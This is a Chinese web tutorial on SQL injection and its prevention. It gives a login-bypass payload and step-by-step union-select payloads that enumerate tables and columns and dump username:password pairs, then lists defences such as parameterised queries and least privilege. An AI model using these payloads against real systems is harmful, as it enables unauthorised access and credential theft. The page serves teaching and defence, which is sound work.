脚本之家 服务器常用软件
快捷导航
您的位置:首页数据库数据库其它 → SQL注入实现及防范

SQL注入的实现以及防范示例详解

 更新时间:2021年06月02日 10:06:35   作者:还会见面吗?  
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,这篇文章主要给大家介绍了关于SQL注入的实现以及防范的相关资料,需要的朋友可以参考下

什么是SQL注入

SQL注入是指通过构建特殊的输入篡改原来的SQL语句达到攻击者所需的操作。

Sql 注入产生原因

我们访问动态网页时往往会向服务器发送请求,服务器向数据访问层发起 Sql 查询请求,若验证通过就会执行 Sql 语句。如果用户输入的数据被构造成恶意Sql代码,如果程序没有细致地过滤用户输入的数据则会使非法数据侵入系统。

登录案例讲解

select * from admin where uname='用户名' and pwd='密码'

输入 'or 1=1 #(–空格或–+或#:注释掉后面的sql语句)

这时SQL语句变为:select * from admin where uname='' or 1=1 # and pwd='密码',这时SQL语句永远成立,绕过登录。

基于GET方式的SQL注入

通过在URL中修改对应的ID值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠来探测URL中是否有注入点。

可登陆到mituan.zone进行测试

1、' '1'' LIMIT 0,1 ' :多了一个单引号

可猜测SQL语句为:select login_name,password from admin where id = 'id' limit 0,1

2、' ' LIMIT 0,1 ':多了一个单引号

可猜测SQL语句为:select login_name,password from admin where id = id limit 0,1

3、' '1'') LIMIT 0,1 ':多了一个单引号

可猜测SQL语句为:select login_name,password from admin where id = ('id') limit 0,1

4、单引号、括号都不报错说明被接收的是字符串类型' "1"") LIMIT 0,1 ':多了一个双引号

可猜测SQL语句为:select login_name,password from admin where id = ("id") limit 0,1

SQL注入利用

1、利用order by判断字段数

order by n(n为猜测字段数)--+

以案例一为例

select login_name,password from admin where id = 'id' limit 0,1
用?id=1' order by 11--+

猜测错误时则会报错

此时探测到有3个字段,用?id=0' union select 1,2,3--+探测到Login_name在第二列,Password在第三列,则第二、三列可利用。

?id=0' union select 1,2,3--+2,3改为user():查看当前MYSQL登录用户名,database():查看当前使用MYSQL数据库名,version():查看当前MYSQL版本,如改为?id=0'union select 1,user(),database()--+ 得到下图中信息

2、利用union select 联合查询,获取表名。(在使用union select时要将前面的SQL语句报错)

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

3、利用union select 联合查询,获取字段名。(以上面查询到的users表为例)

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

4、利用union select 联合查询,获取字段值。(以上面查询到的users表为例)

union select 1,group_concat(username,0x3a,password),3 from users--+ (0x3a为冒号,用来分隔不同字段的值)

如果是地址栏不能显示信息的POST形式则可以在对话框中输入注入语句






这里使用的方法和在地址栏中的输入一样,都是先报错前面的SQL语句再使用union select联合查询拿出表中数据

SQL 注入的防范方法

  • 对用户的输入进行过滤。如:对用户的输入进行校验,可以通过正则表达式、限制长度、对单引号和双"-"进行转换等。
  • 编写程序时不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取。
  • 不要直接使用管理员权限的数据库连接,每个应用使用单独的且权限有限的数据库。
  • 不要把机密信息直接存放,加密或者hash掉密码和敏感的信息。
  • 程序的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装。

总结

到此这篇关于SQL注入的实现以及防范的文章就介绍到这了,更多相关SQL注入实现及防范内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

您可能感兴趣的文章:

相关文章

  • 数据库设计的折衷方法

    数据库设计的折衷方法

    这篇文章主要介绍了数据库设计的折衷方法,需要的朋友可以参考下
    2007-03-03
  • Hive如何写exist/in子句示例详解

    Hive如何写exist/in子句示例详解

    这篇文章主要介绍了在Hive中使用EXISTS和IN子句进行数据查询的方法,EXISTS子句用于检查子查询是否至少返回一行记录,而IN子句用于检查某个值是否存在于指定的列表中,文中通过代码介绍的非常详细,需要的朋友可以参考下
    2025-02-02
  • SQLite 创建数据库实例操作

    SQLite 创建数据库实例操作

    这篇文章主要介绍了SQLite 创建数据库实例操作,本文通过实例代码给大家介绍的非常详细,感兴趣的朋友跟随小编一起看看吧
    2024-05-05
  • Navicat12.1系列破解激活教程亲测有效

    Navicat12.1系列破解激活教程亲测有效

    这篇文章主要介绍了 Navicat12.1系列破解激活教程亲测有效,本文给大家介绍的非常详细,对大家的学习或工作工作具有一定的参考借鉴价值,需要的朋友可以参考下
    2020-11-11
  • 解决Navicat Premium 15连接数据库闪退的问题

    解决Navicat Premium 15连接数据库闪退的问题

    这篇文章主要介绍了Navicat Premium 15连接数据库闪退,本文给大家分享解决方法,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
    2021-03-03
  • 数据库运维人员DBA工作总结

    数据库运维人员DBA工作总结

    中大型公司都会有一些专攻数据库方面的牛人,专门的职位叫做DBA,对于公司的DBA他们的价值不可小觑,只要是数据库,就有吞吐量的限制,数据库访问瓶颈便是自然流量增长或者流量突增造成的
    2023-10-10
  • mssql数据同步实现数据复制的步骤

    mssql数据同步实现数据复制的步骤

    需要用到mssql数据同步的朋友可以参考本文和上一篇文章
    2008-09-09
  • 如何用分表存储来提高性能 推荐

    如何用分表存储来提高性能 推荐

    如何用分表存储来提高性能 ,需要的朋友可以参考下。
    2011-09-09
  • 大数据量,海量数据处理方法总结

    大数据量,海量数据处理方法总结

    大数据量的问题是很多面试笔试中经常出现的问题,比如baidu google 腾讯这样的一些涉及到海量数据的公司经常会问到。
    2010-11-11
  • 处理Hive中的数据倾斜的方法

    处理Hive中的数据倾斜的方法

    数据倾斜是大数据处理不可避免会遇到的问题,那么在Hive中数据倾斜又是如何导致的?通过本片本章,你可以清楚的认识为什么Hive中会发生数据倾斜;发生数据倾斜时我们又该用怎么的方案去解决不同的数据倾斜问题,需要的朋友可以参考下
    2024-10-10

最新评论